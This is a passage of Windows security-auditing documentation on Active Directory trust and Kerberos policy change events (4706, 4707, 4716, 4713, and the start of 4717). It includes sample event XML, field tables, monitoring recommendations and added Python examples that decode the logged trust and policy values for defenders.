For more information, see "Keys and Trusts", section 6.1.6.9.1. Only evaluated on TRUST_TYPE_MIT.

0x200 = TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION: If this bit is set, tickets granted under
this trust MUST NOT be trusted for delegation. The behavior controlled by this bit is as specified in [MS-KILE]
section 3.3.5.7.5. Only supported on Windows Server 2012, Windows Server 2012 R2, and Windows Server 2016.

0x400 = TRUST_ATTRIBUTE_PIM_TRUST: If this bit and the TATE bit (TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL)
are set, then a cross-forest trust to a domain is to be treated as a Privileged Identity Management trust for the
purposes of SID Filtering. For more information on how each trust type is filtered, see [MS-PAC] section 4.1.2.2.
Evaluated only on Windows Server 2016. Evaluated only if SID Filtering is used. Evaluated only on cross-forest
trusts having TRUST_ATTRIBUTE_FOREST_TRANSITIVE. Can be set only if the forest and the trusted forest are
running in a forest functional level of DS_BEHAVIOR_WINTHRESHOLD or greater.

SID Filtering [Type = UnicodeString]: SID Filtering state for the new trust:
Enabled
Disabled

Security Monitoring Recommendations


For 4706(S): A new trust was created to a domain.
Any changes related to Active Directory domain trusts (especially creation of the new trust) must be monitored
and alerts should be triggered. If this change was not planned, investigate the reason for the change.
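The Trust Information fields above arrive as raw integers, and Trust Attributes is a bit mask that has to be converted to hexadecimal and matched bit by bit against the list. The following is an added example, not Microsoft's code or part of this documentation. It decodes the Trust Type, Trust Direction, Trust Attributes and SID Filtering fields of a 4706 record (4716 carries the same TdoType/TdoDirection/TdoAttributes fields) and adds a few risk rules of its own, such as flagging a forest trust whose SID filtering is disabled or relaxed through TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL. The value tables are the ones documented above; the sample inputs and the risk rules are the example's, not the page's.

```python
"""Decode the Trust Information fields carried by 4706 (and 4716) and flag weak trusts.

Added example, not Microsoft's code. The value/name tables are those documented
above; the risk rules in assess_trust() are this example's own reading of them."""

TRUST_TYPES = {1: "TRUST_TYPE_DOWNLEVEL", 2: "TRUST_TYPE_UPLEVEL",
               3: "TRUST_TYPE_MIT", 4: "TRUST_TYPE_DCE"}
TRUST_DIRECTIONS = {0: "TRUST_DIRECTION_DISABLED", 1: "TRUST_DIRECTION_INBOUND",
                    2: "TRUST_DIRECTION_OUTBOUND", 3: "TRUST_DIRECTION_BIDIRECTIONAL"}
TRUST_ATTRIBUTES = {  # bit mask; the event logs it in decimal
    0x1: "TRUST_ATTRIBUTE_NON_TRANSITIVE",
    0x2: "TRUST_ATTRIBUTE_UPLEVEL_ONLY",
    0x4: "TRUST_ATTRIBUTE_QUARANTINED_DOMAIN",
    0x8: "TRUST_ATTRIBUTE_FOREST_TRANSITIVE",
    0x10: "TRUST_ATTRIBUTE_CROSS_ORGANIZATION",
    0x20: "TRUST_ATTRIBUTE_WITHIN_FOREST",
    0x40: "TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL",
    0x80: "TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION",
    0x200: "TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "TRUST_ATTRIBUTE_PIM_TRUST",
}


def decode_attributes(value: int) -> list:
    """Split the decimal TdoAttributes value into its named bits; unknown bits are kept as hex."""
    names = [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)
    if unknown:
        names.append("UNKNOWN(0x%x)" % unknown)
    return names


def assess_trust(decoded: dict) -> list:
    """Example rules (this example's own): surface trusts whose SID filtering or delegation
    posture is weaker than the default for an external or forest trust."""
    attrs = set(decoded["attributes"])
    risks = []
    if "TRUST_ATTRIBUTE_WITHIN_FOREST" in attrs:
        return risks  # intra-forest trust: governed by forest-internal rules, not scored here
    if decoded["sid_filtering"] == "Disabled":
        risks.append("SID filtering disabled on an external or forest trust")
    if "TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL" in attrs:
        risks.append("cross-forest trust filtered only as an external trust (relaxed SID filtering)")
    if ("TRUST_ATTRIBUTE_FOREST_TRANSITIVE" in attrs
            and "TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION" not in attrs):
        risks.append("forest trust does not block TGT delegation")
    if decoded["type"] == "TRUST_TYPE_MIT":
        risks.append("MIT realm trust: verify key types (DES-CBC/DES-CRC are the documented defaults)")
    return risks


def decode_trust(tdo_type: int, tdo_direction: int, tdo_attributes: int, sid_filtering: str) -> dict:
    """Render the four Trust Information fields the way the event message does, plus risk notes."""
    decoded = {
        "type": TRUST_TYPES.get(tdo_type, "UNKNOWN(%d)" % tdo_type),
        "direction": TRUST_DIRECTIONS.get(tdo_direction, "UNKNOWN(%d)" % tdo_direction),
        "attributes_hex": "0x%x" % tdo_attributes,  # the conversion the field description asks for
        "attributes": decode_attributes(tdo_attributes),
        # The raw XML carries a %%-resource reference (e.g. %%1796); the rendered text is Enabled/Disabled.
        "sid_filtering": sid_filtering if sid_filtering in ("Enabled", "Disabled") else "unresolved",
    }
    decoded["risks"] = assess_trust(decoded)
    return decoded


if __name__ == "__main__":
    # Values from the 4706 record above: TdoType=2, TdoDirection=3, TdoAttributes=32.
    print(decode_trust(2, 3, 32, "Enabled"))
    # Constructed: an outbound forest trust whose SID filtering was relaxed and then disabled.
    print(decode_trust(2, 2, 0x8 | 0x40, "Disabled"))
```

For the record on this page the decoder yields TRUST_TYPE_UPLEVEL, TRUST_DIRECTION_BIDIRECTIONAL and 0x20 = TRUST_ATTRIBUTE_WITHIN_FOREST, so no risk is raised; the constructed forest trust raises three. Feed the function with the decimal values pulled from TdoType, TdoDirection and TdoAttributes in the event's EventData, and with the rendered SID Filtering text.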
4707(S): A trust to a domain was removed.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when a domain trust was removed.
This event is generated only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4707</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T20:41:13.080444700Z" />
<EventRecordID>1049754</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="580" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="DomainName">FABRIKAM</Data>
<Data Name="DomainSid">S-1-5-21-2226861337-2836268956-2433141405</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e99d6</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “remove domain trust” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “remove domain trust”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Domain Information:
Domain Name [Type = UnicodeString]: the name of removed trusted domain.
Domain ID [Type = SID]: SID of removed trusted domain. Event Viewer automatically tries to resolve SIDs
and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Security Monitoring Recommendations
For 4707(S): A trust to a domain was removed.
Any changes related to Active Directory domain trusts (especially trust removal) must be monitored and alerts
should be triggered. If this change was not planned, investigate the reason for the change.

4716(S): Trusted domain information was modified.
4/18/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when the trust was modified.
This event is generated only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4716</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T22:55:54.560735500Z" />
<EventRecordID>1049763</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="4920" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
<Data Name="DomainName">-</Data>
<Data Name="DomainSid">S-1-5-21-2226861337-2836268956-2433141405</Data>
<Data Name="TdoType">2</Data>
<Data Name="TdoDirection">3</Data>
<Data Name="TdoAttributes">32</Data>
<Data Name="SidFilteringEnabled">-</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “modify domain trust settings” operation. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “modify domain trust
settings” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Trusted Domain:
Domain Name [Type = UnicodeString]: the name of changed trusted domain. If this attribute was not
changed, then it will have “-” value.
Domain ID [Type = SID]: SID of changed trusted domain. Event Viewer automatically tries to resolve SIDs
and show the account name. If the SID cannot be resolved, you will see the source data in the event.
New Trust Information:
Trust Type [Type = UInt32]: the type of new trust. If this attribute was not changed, then it will have “-” value or
its old value. The following table contains possible values for this field:

VALUE ATTRIBUTE VALUE DESCRIPTION

1 TRUST_TYPE_DOWNLEVEL
    The domain controller of the trusted domain is a computer running an operating system earlier than
    Windows 2000.

2 TRUST_TYPE_UPLEVEL
    The domain controller of the trusted domain is a computer running Windows 2000 or later.

3 TRUST_TYPE_MIT
    The trusted domain is running a non-Windows, RFC4120-compliant Kerberos distribution. This type of trust is
    distinguished in that (1) a SID is not required for the TDO, and (2) the default key types include the
    DES-CBC and DES-CRC encryption types (see [RFC4120] section 8.1).

4 TRUST_TYPE_DCE
    The trusted domain is a DCE realm. Historical reference, this value is not used in Windows.

Trust Direction [Type = UInt32]: the direction of new trust. If this attribute was not changed, then it will have
“-” value or its old value. The following table contains possible values for this field:

VALUE ATTRIBUTE VALUE DESCRIPTION

0 TRUST_DIRECTION_DISABLED
    The trust relationship exists, but it has been disabled.

1 TRUST_DIRECTION_INBOUND
    The trusted domain trusts the primary domain to perform operations such as name lookups and
    authentication.

2 TRUST_DIRECTION_OUTBOUND
    The primary domain trusts the trusted domain to perform operations such as name lookups and
    authentication.

3 TRUST_DIRECTION_BIDIRECTIONAL
    Both domains trust one another for operations such as name lookups and authentication.

Trust Attributes [Type = UInt32]: the decimal value of attributes for new trust. The value is a bit mask, so you
need to convert the decimal value to hexadecimal and look up each set bit in the table below; more than one
attribute can be set at once. If this attribute was not changed, then it will have “-” value or its old value. The
following table contains possible values for this field:

VALUE ATTRIBUTE VALUE DESCRIPTION

0x1 TRUST_ATTRIBUTE_NON_TRANSITIVE
    If this bit is set, then the trust cannot be used transitively. For example, if domain A trusts domain B,
    which in turn trusts domain C, and the A<-->B trust has this attribute set, then a client in domain A cannot
    authenticate to a server in domain C over the A<-->B<-->C trust linkage.

0x2 TRUST_ATTRIBUTE_UPLEVEL_ONLY
    If this bit is set in the attribute, then only Windows 2000 operating system and newer clients may use the
    trust link. Netlogon does not consume trust objects that have this flag set.

0x4 TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
    If this bit is set, the trusted domain is quarantined and is subject to the rules of SID Filtering as
    described in [MS-PAC] section 4.1.2.2.

0x8 TRUST_ATTRIBUTE_FOREST_TRANSITIVE
    If this bit is set, the trust link is a cross-forest trust [MS-KILE] between the root domains of two forests,
    both of which are running in a forest functional level of DS_BEHAVIOR_WIN2003 or greater.
    Only evaluated on Windows Server 2003 operating system, Windows Server 2008 operating system, Windows
    Server 2008 R2 operating system, Windows Server 2012 operating system, Windows Server 2012 R2 operating
    system, and Windows Server 2016 operating system.
    Can only be set if forest and trusted forest are running in a forest functional level of
    DS_BEHAVIOR_WIN2003 or greater.

0x10 TRUST_ATTRIBUTE_CROSS_ORGANIZATION
    If this bit is set, then the trust is to a domain or forest that is not part of the organization. The
    behavior controlled by this bit is explained in [MS-KILE] section 3.3.5.7.5 and [MS-APDS] section 3.1.5.
    Only evaluated on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012,
    Windows Server 2012 R2, and Windows Server 2016.
    Can only be set if forest and trusted forest are running in a forest functional level of
    DS_BEHAVIOR_WIN2003 or greater.

0x20 TRUST_ATTRIBUTE_WITHIN_FOREST
    If this bit is set, then the trusted domain is within the same forest.
    Only evaluated on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012,
    Windows Server 2012 R2, and Windows Server 2016.

0x40 TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL
    If this bit is set, then a cross-forest trust to a domain is to be treated as an external trust for the
    purposes of SID Filtering. Cross-forest trusts are more stringently filtered than external trusts. This
    attribute relaxes those cross-forest trusts to be equivalent to external trusts.
    Only evaluated on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012,
    Windows Server 2012 R2, and Windows Server 2016.
    Only evaluated if SID Filtering is used.
    Only evaluated on cross-forest trusts having TRUST_ATTRIBUTE_FOREST_TRANSITIVE.
    Can only be set if forest and trusted forest are running in a forest functional level of
    DS_BEHAVIOR_WIN2003 or greater.

0x80 TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION
    This bit is set on trusts with the trustType set to TRUST_TYPE_MIT, which are capable of using RC4 keys.
    Historically, MIT Kerberos distributions supported only DES and 3DES keys ([RFC4120], [RFC3961]). MIT 1.4.1
    adopted the RC4HMAC encryption type common to Windows 2000 [MS-KILE], so trusted domains deploying later
    versions of the MIT distribution required this bit. For more information, see "Keys and Trusts", section
    6.1.6.9.1.
    Only evaluated on TRUST_TYPE_MIT.

0x200 TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION
    If this bit is set, tickets granted under this trust MUST NOT be trusted for delegation. The behavior
    controlled by this bit is as specified in [MS-KILE] section 3.3.5.7.5.
    Only supported on Windows Server 2012, Windows Server 2012 R2, and Windows Server 2016.

0x400 TRUST_ATTRIBUTE_PIM_TRUST
    If this bit and the TATE bit are set, then a cross-forest trust to a domain is to be treated as Privileged
    Identity Management trust for the purposes of SID Filtering. For more information on how each trust type is
    filtered, see [MS-PAC] section 4.1.2.2.
    Evaluated only on Windows Server 2016.
    Evaluated only if SID Filtering is used.
    Evaluated only on cross-forest trusts having TRUST_ATTRIBUTE_FOREST_TRANSITIVE.
    Can be set only if the forest and the trusted forest are running in a forest functional level of
    DS_BEHAVIOR_WINTHRESHOLD or greater.

SID Filtering [Type = UnicodeString]: SID Filtering state for the new trust:
Enabled
Disabled
If this attribute was not changed, then it will have “-” value or its old value.
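The field descriptions above are enough to turn the raw numbers in a 4716 event into the names in the tables. The following is an added example, not code from the Microsoft page: it parses the page's sample 4716 XML (embedded below, trimmed to the fields used) and decodes TdoType, TdoDirection and the TdoAttributes bit mask, treating “-” as "not changed" and reporting any bit or number the tables do not list instead of silently dropping it. The function names are this example's own.

```python
"""Decode the trust fields of a 4716 event (added example, not from the Microsoft page)."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

TRUST_TYPES = {
    1: "TRUST_TYPE_DOWNLEVEL",
    2: "TRUST_TYPE_UPLEVEL",
    3: "TRUST_TYPE_MIT",
    4: "TRUST_TYPE_DCE",
}
TRUST_DIRECTIONS = {
    0: "TRUST_DIRECTION_DISABLED",
    1: "TRUST_DIRECTION_INBOUND",
    2: "TRUST_DIRECTION_OUTBOUND",
    3: "TRUST_DIRECTION_BIDIRECTIONAL",
}
# TdoAttributes is logged in decimal; each bit below is one row of the attributes table.
TRUST_ATTRIBUTES = {
    0x1: "TRUST_ATTRIBUTE_NON_TRANSITIVE",
    0x2: "TRUST_ATTRIBUTE_UPLEVEL_ONLY",
    0x4: "TRUST_ATTRIBUTE_QUARANTINED_DOMAIN",
    0x8: "TRUST_ATTRIBUTE_FOREST_TRANSITIVE",
    0x10: "TRUST_ATTRIBUTE_CROSS_ORGANIZATION",
    0x20: "TRUST_ATTRIBUTE_WITHIN_FOREST",
    0x40: "TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL",
    0x80: "TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION",
    0x200: "TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "TRUST_ATTRIBUTE_PIM_TRUST",
}

# The page's sample 4716 event, trimmed to the fields this decoder reads.
SAMPLE_4716 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4716</EventID><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
<Data Name="DomainName">-</Data>
<Data Name="DomainSid">S-1-5-21-2226861337-2836268956-2433141405</Data>
<Data Name="TdoType">2</Data>
<Data Name="TdoDirection">3</Data>
<Data Name="TdoAttributes">32</Data>
<Data Name="SidFilteringEnabled">-</Data>
</EventData>
</Event>"""


def event_data(xml_text):
    """Return the EventData <Data Name=...> elements as a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}


def decode_enum(value, table):
    """'-' means the attribute was not changed; unknown numbers are reported, not hidden."""
    if value == "-":
        return None
    number = int(value)
    return table.get(number, f"UNKNOWN_{number}")


def decode_trust_attributes(value):
    """Split the decimal TdoAttributes bit mask into attribute names; '-' means unchanged."""
    if value == "-":
        return None
    bits = int(value)
    names = [name for bit, name in TRUST_ATTRIBUTES.items() if bits & bit]
    unknown = bits & ~sum(TRUST_ATTRIBUTES)  # bits the table does not document
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:x}")
    return names


def decode_4716(xml_text):
    """Decode one 4716 event into the names used by the field descriptions."""
    d = event_data(xml_text)
    return {
        "subject": f"{d['SubjectDomainName']}\\{d['SubjectUserName']}",
        "subject_sid": d["SubjectUserSid"],
        "domain_name": None if d["DomainName"] == "-" else d["DomainName"],
        "domain_sid": d["DomainSid"],
        "trust_type": decode_enum(d["TdoType"], TRUST_TYPES),
        "trust_direction": decode_enum(d["TdoDirection"], TRUST_DIRECTIONS),
        "trust_attributes": decode_trust_attributes(d["TdoAttributes"]),
        "sid_filtering": None if d["SidFilteringEnabled"] == "-" else d["SidFilteringEnabled"],
    }


if __name__ == "__main__":
    for key, value in decode_4716(SAMPLE_4716).items():
        print(f"{key}: {value}")
```

For the page's sample the decoder yields TRUST_TYPE_UPLEVEL, TRUST_DIRECTION_BIDIRECTIONAL and the single attribute TRUST_ATTRIBUTE_WITHIN_FOREST (decimal 32 = 0x20); DomainName and SidFilteringEnabled are “-”, so they are reported as unchanged rather than as empty strings.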

Security Monitoring Recommendations
For 4716(S): Trusted domain information was modified.
Any changes in Active Directory domain trust settings must be monitored and alerts should be triggered. If this
change was not planned, investigate the reason for the change.

4713(S): Kerberos policy was changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when Kerberos policy was changed.
This event is generated only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4713</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T23:15:50.811774300Z" />
<EventRecordID>1049772</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="4116" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="KerberosPolicyChange">KerMaxT: 0x10c388d000 (0x861c46800); KerMaxR: 0x19254d38000 (0xc92a69c000);</Data>
</EventData>
</Event>
Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made a change to Kerberos policy. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to Kerberos policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Changes Made [Type = UnicodeString]: '--' means no changes, otherwise each change is shown as:
Parameter_Name: new_value (old_value). The raw values are counts of 100-nanosecond intervals, which is why the
divisors below turn them into minutes, hours, or days. Here is a list of possible parameter names:

PARAMETER NAME DESCRIPTION

KerProxy
    Maximum tolerance for computer clock synchronization.
    To convert the KerProxy value to minutes you need to:
    Convert the value to decimal value.
    Divide value by 600000000.

KerMaxR
    Maximum lifetime for user ticket renewal.
    To convert the KerMaxR value to days you need to:
    Convert the value to decimal value.
    Divide value by 864000000000.

KerMaxT
    Maximum lifetime for user ticket.
    To convert the KerMaxT value to hours you need to:
    Convert the value to decimal value.
    Divide value by 36000000000.

KerMinT
    Maximum lifetime for service ticket.
    To convert the KerMinT value to minutes you need to:
    Convert the value to decimal value.
    Divide value by 600000000.

KerOpts
    Enforce user logon restrictions:
    0x80 – Enabled
    0x0 – Disabled

This event shows changes in “Kerberos policy”. Kerberos policies are located in the Group Policy Management
console under “\Security Settings\Account Policies\Kerberos Policy”.
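The conversions in the table above, applied to the page's sample KerberosPolicyChange string, as an added example (this is not code from the Microsoft page). It parses each "Parameter: new (old);" entry, converts the hexadecimal values with the page's divisors, and decodes KerOpts as the 0x80 flag; an unknown parameter name is kept as a decimal value rather than guessed at. It assumes the raw values are 100-nanosecond counts, which is what the page's divisors imply, and the function names are its own.

```python
"""Convert a 4713 "Changes Made" string to human units (added example, not from the Microsoft page)."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Parameter -> (unit, divisor) exactly as listed in the page's table.
UNITS = {
    "KerProxy": ("minutes", 600_000_000),
    "KerMaxR": ("days", 864_000_000_000),
    "KerMaxT": ("hours", 36_000_000_000),
    "KerMinT": ("minutes", 600_000_000),
}
KEROPTS_ENFORCE_LOGON_RESTRICTIONS = 0x80

# One "Name: new (old);" entry per changed parameter, both values in hex.
CHANGE_RE = re.compile(r"(\w+):\s*(0x[0-9a-fA-F]+)\s*\((0x[0-9a-fA-F]+)\)")

# The page's sample 4713 event, trimmed to the fields used here.
SAMPLE_4713 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4713</EventID><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="KerberosPolicyChange">KerMaxT: 0x10c388d000 (0x861c46800); KerMaxR: 0x19254d38000 (0xc92a69c000);</Data>
</EventData>
</Event>"""


def convert(name, raw):
    """Map one raw hex value to the unit the page documents for that parameter."""
    value = int(raw, 16)
    if name == "KerOpts":
        return "Enabled" if value & KEROPTS_ENFORCE_LOGON_RESTRICTIONS else "Disabled"
    if name in UNITS:
        return value / UNITS[name][1]
    return value  # unknown parameter: keep the decimal value rather than guess a unit


def parse_changes(changes):
    """'--' means no changes; otherwise return one dict per changed parameter."""
    if changes.strip() in ("--", ""):
        return []
    result = []
    for name, new_raw, old_raw in CHANGE_RE.findall(changes):
        unit = "flag" if name == "KerOpts" else UNITS.get(name, ("raw", None))[0]
        result.append({"parameter": name, "unit": unit,
                       "new": convert(name, new_raw), "old": convert(name, old_raw)})
    return result


def decode_4713(xml_text):
    """Return who changed the policy and the decoded list of changes."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return {
        "subject": f"{data['SubjectDomainName']}\\{data['SubjectUserName']}",
        "changes": parse_changes(data["KerberosPolicyChange"]),
    }


if __name__ == "__main__":
    for change in decode_4713(SAMPLE_4713)["changes"]:
        print(f"{change['parameter']}: {change['old']} -> {change['new']} {change['unit']}")
```

On the page's sample this reports KerMaxT going from 1 to 2 hours and KerMaxR from 1 to 2 days, which is the form a reviewer needs when deciding whether the change was planned.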

Security Monitoring Recommendations
For 4713(S): Kerberos policy was changed.
Any changes in Kerberos policy reported by current event must be monitored and an alert should be triggered.
If this change was not planned, investigate the reason for the change.

4717(S): System security access was granted to an account.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates every time local logon user right policy is changed and a logon right was granted to an
account.
You will see a unique event for every user if logon user rights were granted to multiple accounts.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4717</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-02T00:02:33.213572000Z" />
<EventRecordID>1049777</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="2064" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="AccessGranted">SeInteractiveLogonRight</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made a change to local logon right user policy. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
